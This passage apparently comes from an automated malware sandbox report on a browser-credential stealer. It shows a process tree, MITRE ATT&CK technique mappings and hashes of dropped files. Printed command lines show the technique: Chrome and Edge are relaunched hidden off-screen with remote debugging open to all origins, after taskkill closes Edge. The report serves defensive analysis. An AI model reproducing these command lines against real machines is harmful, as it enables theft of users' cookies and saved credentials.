        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        
        PID:2024
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffaf3dbcc40,0x7ffaf3dbcc4c,0x7ffaf3dbcc58
        8⤵
        
        PID:3628
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=1884,i,8027239503232250163,8691548713464106498,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1880 /prefetch:2
        8⤵
        
        PID:4216
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --no-appcompat-clear --field-trial-handle=1796,i,8027239503232250163,8691548713464106498,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1984 /prefetch:3
        8⤵
        
        PID:3784
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --no-appcompat-clear --field-trial-handle=2060,i,8027239503232250163,8691548713464106498,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2260 /prefetch:8
        8⤵
        
        PID:4836
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2864,i,8027239503232250163,8691548713464106498,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2884 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:1472
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2888,i,8027239503232250163,8691548713464106498,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2896 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:1772
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4024,i,8027239503232250163,8691548713464106498,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4052 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:4340
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-sandbox --no-appcompat-clear --field-trial-handle=4116,i,8027239503232250163,8691548713464106498,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4140 /prefetch:8
        8⤵
        
        PID:4588
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-sandbox --no-appcompat-clear --field-trial-handle=4148,i,8027239503232250163,8691548713464106498,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4164 /prefetch:8
        8⤵
        
        PID:3548
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        
        PID:2356
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:/Program Files (x86)/Microsoft/Edge/Application/msedge.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
        7⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        
        PID:3172
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb01be46f8,0x7ffb01be4708,0x7ffb01be4718
        8⤵
        
        PID:3640
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,3162536282485924930,7209129701883657859,131072 --no-sandbox --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2140 /prefetch:2
        8⤵
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        
        PID:1860
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,3162536282485924930,7209129701883657859,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2208 /prefetch:3
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3624
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,3162536282485924930,7209129701883657859,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --mojo-platform-channel-handle=2420 /prefetch:8
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4148
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=9222 --field-trial-handle=2096,3162536282485924930,7209129701883657859,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:1
        8⤵
        Uses browser remote debugging
        Suspicious behavior: EnumeratesProcesses
        
        PID:2116
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=9222 --field-trial-handle=2096,3162536282485924930,7209129701883657859,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:1
        8⤵
        Uses browser remote debugging
        Suspicious behavior: EnumeratesProcesses
        
        PID:3076
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=9222 --field-trial-handle=2096,3162536282485924930,7209129701883657859,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4512 /prefetch:1
        8⤵
        Uses browser remote debugging
        Suspicious behavior: EnumeratesProcesses
        
        PID:2492
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=9222 --field-trial-handle=2096,3162536282485924930,7209129701883657859,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4584 /prefetch:1
        8⤵
        Uses browser remote debugging
        Suspicious behavior: EnumeratesProcesses
        
        PID:392

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:2112

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Modify Authentication Process

T1556

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Authentication Process

T1556

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Filesize
40B

MD5
1fd21a5228803360e7498b21377bd349

SHA1
c028d9a423b995bb2f9d9b56ef09e5a4f9535b38

SHA256
920270c469d0fdd572881597d30bae6f24faec32c8a1e7e689186947ac7958d3

SHA512
c2324e1b0a32c3d4abdac5ee1c2e663d1e49c24c17f0b5a5dac56cc867f67d2665f29148de2773f2e048292b189d136876b557ae9837517f612155633cbb09b2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
c3ae7a929ae231e59a558a6df74c7c50

SHA1
61f7613eb04aa25cca750e81f7a5f6425b91f4a3

SHA256
a3b80c753f2ebf4aa4c9684375ddbb9e4dd4a756c4237390eafb6e64b8547232

SHA512
623576bdc6850310113e700a1f655d4727bef9c6dfbdbe71ae3f09776b055a8c19d6987d4b9cf624234713ca85a3e0933f747d5fbc2fd2f1068019af486c025c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000029

Filesize
263KB

MD5
01ab4d556cdf52d75592d06b69de19ba

SHA1
97cbace25ea71efcaad503076d3e75f661d32934

SHA256
6f936bbb615386f289f5314b08cc632580d9ad8d55a0d6a19f37dc6df22758ef

SHA512
383f9f79b65ae999410c42062683faa07e463a07d8b03fdbb7185909a9752e5d02cd5a7da200ca6fdd8f93f4e5c646867d63827549b369766493abe90368272c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
336B

MD5
184b4193bff80ec092164786f187d506

SHA1
fd6a2a8134b53d6abe18d27a0df3330775132dc3

SHA256
a29b3f494cf4930b7b92cf71589d6d7973b22fcbc664cbcd3aee89dfffe7d04e

SHA512
eb27634191f0c3ec842fa96ab4a3258525d612d10e9bc42710c8dd8b1a3ac40fe5587cbccff683ea9ceb5c7e05104dbfc0318d4c6ce3b7726a1438eea5a00033

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
3KB

MD5
7ec8bf4f120885e791e974e1df0d51bd

SHA1
a2befd8040df533f900bfe109811a89bc4dc0d4f

SHA256
280e6666782e420d6aa14b9dd729c0bbdbac25225fa399f7f9fa7a985d52fe20

SHA512
307177fd8f57a58a840e293805f258a27ecf7c40a600be151dd4e222691b133733010692ea58c1725cc9d930da5783379faa5d22657735e7b1706162e5bee77d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
9daf631b1b87730c61e3520442fbdec5

SHA1
5e94381965dd017906525edc245512ec21a65331

SHA256
5c2ef20ce036b5bc7f3030c8bddf490624c039e1a1c42a8c30e6c92e580f2495

SHA512
03e58854fffbdce04de77fc1d4829edba1fe94acc7c9e40742e41c266f280d3c394b87022224174d411002cbad67c6c5ab503f2b259cee82bfa7628b784e933a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
18b0eecd59097262679923f098994ebb

SHA1
5f6fb1ef2303639eeabe2b792da50994226a9989

SHA256
dd7edf1e36ccefcf2a2a7bdcb727440a755ea06288d6c5d9921bb08c426f26fa

SHA512
cc343adfba3815964d5f3bce1a2597c104a89dedc381183f64c228bf710b2608f96650b869f17ae55c91110da93eb1e8e1b1a593cd1f10751e4e6897538ea39c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
523B

MD5
ae689d33e810d2b609fb3454fd5e2836

SHA1
fe60e7d25a9db3dc24bc88e896d1fe39c1b64b38

SHA256
accc17440d1ca2fb4ca3f28ce7e38613f169156977abab5cfbe05d4f81d4e594

SHA512
e4d531c2a27c5504d86ac8ae6e28122c3446261c660ca3faf087a2fe98dd6ed1c338994f8cc0ffa92c2ebb23cb3bacce0e7f9e59e9204b489444bc746d7b2dc5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
b09e854b3a7dc6cb3bfccceb0aee611f

SHA1
1a96bb508ccb02a22d4150158811bf84eb2fd146

SHA256
5e60f649849629f852972a70d49626223a105d64b42fc433ca97e1a5ee1a10f5

SHA512
454711af3c2e3fefe0520da6abb04fcdfc63b5e2c489512f634b11ee859c914cd9817e65fe00ebf52ac21deb6527891b2c28c324cb64a81011bc51b5a4d46679

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
e4d596db61c3a568ff7fd17acd2487ef

SHA1
7a530b11b97250ad23dbe825246050b97d38a676

SHA256
045e94c91f7681e2e6c6679f0da87db786eccda7d43bf5559b385e6e5f771765

SHA512
52b88973cd535d9c737e9f53e0b6e9a7d9bb318edd6fde5e99ce8e3ffe55c41b9d41346e3f9e8f52a4a06093569236ea14ec98a0a316d61f279125ac4b6398d7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
43c8edf0144f8a1d79799489e4efc87e

SHA1
4a9a6ff9dc676aba22b60e3af4e1129b6fe316d0

SHA256
c38bcbfb12fda2661634719b9dd53b48459d67aab1eace4adfeb0d741ac413d2

SHA512
518e187dcf46cd9e1be4f3045c8f9cde5c5107b38b0ea4024257f9f460a23c96a9df9522beea960d1355e87b13e7663ca8b448579bab45719cc2847d5921c7bd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
13e335992153cef8794c79d1c9d7b457

SHA1
972c711a192069aa0c6397a9cf8f22f1b374d413

SHA256
7b508ccc8d87f5d351f3667d9a596b7aa5765aa8649dc718a2c02e7a0cec071a

SHA512
844606d17a6e548e1ee5bd43979d730bb4bd570d7691c5403bce0e5290f15e6ddb4dc1bc59d4626db5475f660d7bd43622cd40a57ba0516e439b50bce45817f7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
d5737a3ba0b905b1cdfc5cb7767dc963

SHA1
0d668935abe90b0352b00500a23a4b686b8cd718

SHA256
c47bf9a18f02a702a5eed6bce739b01772bec97bb757cdf47b4c184c1f691b47

SHA512
6e83c01d42dd00cef75b40d263abd53e2cad8af218d4fd93851c64b1aacdf04282638c5c153e6922fe33f9bcc0e6eadaa69cf76695ade2d36a9d3686e483fa75

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
58c9ee12c6dc4b5e9821ba6e7b057c9e

SHA1
ba8b01b141e6af51a50620bf9d23ac8b0dba9129

SHA256
b913faaa37f9536e4c566087179e13983da19728b3e07d101e6d5a8bd914d941

SHA512
6854c6c458d1b54588629432230813098a39a22e3bb9d7b1613d5d03d0526f87d53918608103a64d9f15882dcd150c829e5a76002e28797f66d003f6b81c2475

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
108059cfc3f9588f5c22e5daa43b3899

SHA1
e39e729299045d4bbe8d6d13464ab1e02bf10801

SHA256
b725f496d7befba5285161bb9d783beeb8104dbfd195195c4375bf4778bc2624

SHA512
a1d868551d92917e3cf0e653f79f94a9a5eb669507412ed5cb1dc3ca8585839a558a985084d3a64f9945faefccf033d29f4155ec63e2c25dad663f92130b1d20

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
a3afdffc4ceb59aa6a1721e6267c51f6

SHA1
ab316a54ab236557f815f22b88173e1f6b57f089

SHA256
8fa552aed9e659da7d03b14152c305f3cfe870bf875a1ef53dbf2193af5e8299

SHA512
4a8a5630e070bbc98f06a8c5f8848bd68e482f5bc2afe87d59b65a9794e9ca1c43c2540ad7c5b26f3e3921c61f60342a3085716e497589f568f2ca376e23a855

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
ce611e597515d2bdc0946693ce74c8a4

SHA1
8d845fd618f61b45b2fee564940e5457438dc0e4

SHA256
cb4e604e248748c5f843ba7c2750c4acefccaef787bdf91cacd664b5f612ed18

SHA512
f492126483c7cf3ab4ab5d58389de264c85b93cd4f4a8a32b77b59a00c08960342af312a15a96bb325567b6b1d877d26f2a34412ca4bcf1846466ba80e039440

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
24ebc884c022ab8f907d95b602e8fa54

SHA1
5edac824ae5589e913457815a292a694574d4705

SHA256
74f4730eff37b72e085b7032d93e16f5b5f28d45ddd9507ae7e77752ef8007e6

SHA512
f50829c280570f410fa5547467f8a5c9de3ee73e992319fd5d906d9c0026640ca6e3e7af3c1e724af73118acab2b4e5abce352c72cd9098b814543b79893a3d6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
116KB

MD5
943df2725fb31df6660d32750fac14da

SHA1
3d0eb8909530dc6a22362084260e38ed4b0926a9

SHA256
9c0cf237bff57415177abb9b493d19effe160921f53e4b26cb94c1293adfa7a4

SHA512
8b1ec1bca0dbc5d6bcefde7cd0902ac6b5d5eb7cc621d427c6041db1f7113806b1e221dcbfbe901db7c4281e4b9b30c1c7e38888be0dedeac41f8844a06a2e61

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
116KB

MD5
032b4fb8f684bdb7f22425b920c0177d

SHA1
0d455e7c0cd210cfc305e26906e91fd4a45036d4

SHA256
7649fd93da684d446bbc55ea2697c76b23be13a4e85e7b1bb79d35d008a4b9d3

SHA512
282b48e097f144ad943b6598077593cd657ae373864e3c244ac846283d98e585bf4da5673ef5ccf3654d82bc5600034fb1d8a9925c3c83b941c26a5e55e10872

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
443a627d539ca4eab732bad0cbe7332b

SHA1
86b18b906a1acd2a22f4b2c78ac3564c394a9569

SHA256
1e1ad9dce141f5f17ea07c7e9c2a65e707c9943f172b9134b0daf9eef25f0dc9

SHA512
923b86d75a565c91250110162ce13dd3ef3f6bdde1a83f7af235ed302d4a96b8c9ed722e2152781e699dfcb26bb98afc73f5adb298f8fd673f14c9f28b5f764d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
99afa4934d1e3c56bbce114b356e8a99

SHA1
3f0e7a1a28d9d9c06b6663df5d83a65c84d52581

SHA256
08e098bb97fd91d815469cdfd5568607a3feca61f18b6b5b9c11b531fde206c8

SHA512
76686f30ed68144cf943b80ac10b52c74eee84f197cee3c24ef7845ef44bdb5586b6e530824543deeed59417205ac0e2559808bcb46450504106ac8f4c95b9da

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
60645e9bd4cd283144e8fb9f247e563f

SHA1
2f8258309cc9a847f7c8620b0e7cf19d91751752

SHA256
9138e4f8128403b7cd682a28774eaaaa11e4d19ee4a082af2aeba369897857aa

SHA512
620d4eb3ab70d1e038f233bc0b5378c12c9548647e363f04d3241bca20c77d3a2422a166e402b3f79a0c9cdef5b8c9f1850d06d8538e1fcba64acf844e56e9ad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\b7df9759-0863-42fc-af80-76914155241f.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
a26df49623eff12a70a93f649776dab7

SHA1
efb53bd0df3ac34bd119adf8788127ad57e53803

SHA256
4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

SHA512
e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
3KB

MD5
e3c5b1070dd00ecb8dec143b4f98e811

SHA1
32220e6ba97cff67731fbd86e8e39e8e5f374e82

SHA256
c8fd87e2591cb92357457392471440a1e00c48c7b8825daec1a8f49e4f36a4ab

SHA512
4ea1263c1076592b94b1acf71ad679bbf2cf5b7862632bb19c8445f5b74cef5f0d225e9cefb8c1f19a6325902e308b20160f829ba4905bcc304c2942140c113a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
e90feebc6cffe60c4e3e177de3a4512a

SHA1
0fbe95e188a803597543fabbcd40992a6d6c3126

SHA256
a926e424a621f66ece7570e858df145e42c9af25f33897385db76e5fde2b170f

SHA512
5e07f2f370b53e8548c878fc89852d447051fd56530dd7b627e4cebcd41155a1b4ecb419afa7b8561c4e6802af9815e51d0cd1285d3bd2d85af0a9883203048b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
e4de99c1795fd54aa87da05fa39c199c

SHA1
dfaaac2de1490fae01104f0a6853a9d8fe39a9d7

SHA256
23c35f4fcd9f110592d3ff34490e261efbcf6c73aa753887479197fd15289457

SHA512
796b6d3f7b9a336bc347eae8fb11cdbf2ae2ad73aae58de79e096c3ad57bd45eadddae445a95c4ee7452554568d7ab55b0307972b24e2ff75eae4a098ba9e926

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bnmpjlrr.0id.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\file.bat

Filesize
169KB

MD5
e43b33c13082c9371053ec0cfb818734

SHA1
fdaa9f739ca9e31a17d67f9ca1f341b5a8926fa5

SHA256
7d474b256ab4c0e7f4863da52d394f607ac3c747ba235dbbb6db172a19e86214

SHA512
ddcb4f81cca2dd5206ecb512d991826bd8a79736b1f67a4c78d3599479f9aa053dd57ed5a86de11afb27eb09ab782ea47c315e90bd8ec59d486a3d1cd6434a1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\xFSOj9El1Q.zip

Filesize
16.9MB

MD5
9c645b1011a1ca4868b00708fb8530c6

SHA1
bc48cc7f83b6588178796fa3922b6ded0af8b1c2

SHA256
b9e43e501ca30487cf556b8bfe5ea644cd130d1f5cce8f7fbeb4a68eef976d99

SHA512
3ede798b75a6fe6fdd017e5514ee6193409cc27b1b6c42be46e8d74fa5c4b97f55b90927ae66c4266bcf2f7c115310d0e01e1ba2e2cd595cd363556200e1d80d

Download Submit
C:\Users\Admin\AppData\Local\xFSOj9El1Q\DLLs\_hashlib.pyd

Filesize
48KB

MD5
2ac2dee9fdb32be30fefd4fdb5d280b3

SHA1
5e803c5d649521cab34bfc7ef6dc44954915220d

SHA256
f10c90062eaa68f41b1a6b34f3796e3ab8e0d765e595236e893cff9fad30116a

SHA512
86a7dfe6f15fce67accbc84262c73d25f2e440b7529143235b9b32f15f7804f99206e24c5ed8e5219bb5895bf6e397304ba153e064ff97eed23f5e92469e901e

Download Submit
C:\Users\Admin\AppData\Local\xFSOj9El1Q\DLLs\libcrypto-1_1.dll

Filesize
2.2MB

MD5
4633d62f19c0b25318b1c612995f5c21

SHA1
50601f9e2b07d616fde8ee387ce8cdcb0ca451df

SHA256
47376d247ae6033bc30fee4e52043d3762c1c0c177e3ec27ca46eff4b95c69b0

SHA512
d6a18e43b1a20242f80265054ed8d33598439ffa5df4920931ff43ec91f1ac2d8a3931913fd5569f48c9b1b9ea845d9e017ea23571a1ac1b352502a3e823eca9

Download Submit
C:\Users\Admin\AppData\Local\xFSOj9El1Q\Lib\site-packages\pyasn1\codec\der\__init__.py

Filesize
59B

MD5
0fc1b4d3e705f5c110975b1b90d43670

SHA1
14a9b683b19e8d7d9cb25262cdefcb72109b5569

SHA256
1040e52584b5ef6107dfd19489d37ff056e435c598f4e555f1edf4015e7ca67d

SHA512
8a147c06c8b0a960c9a3fa6da3b30a3b18d3612af9c663ee24c8d2066f45419a2ff4aa3a636606232eca12d7faef3da0cbbd3670a2d72a3281544e1c0b8edf81

Download Submit
C:\Users\Admin\AppData\Local\xFSOj9El1Q\Lib\site-packages\win32comext\axscript\__init__.py

Filesize
135B

MD5
f45c606ffc55fd2f41f42012d917bce9

SHA1
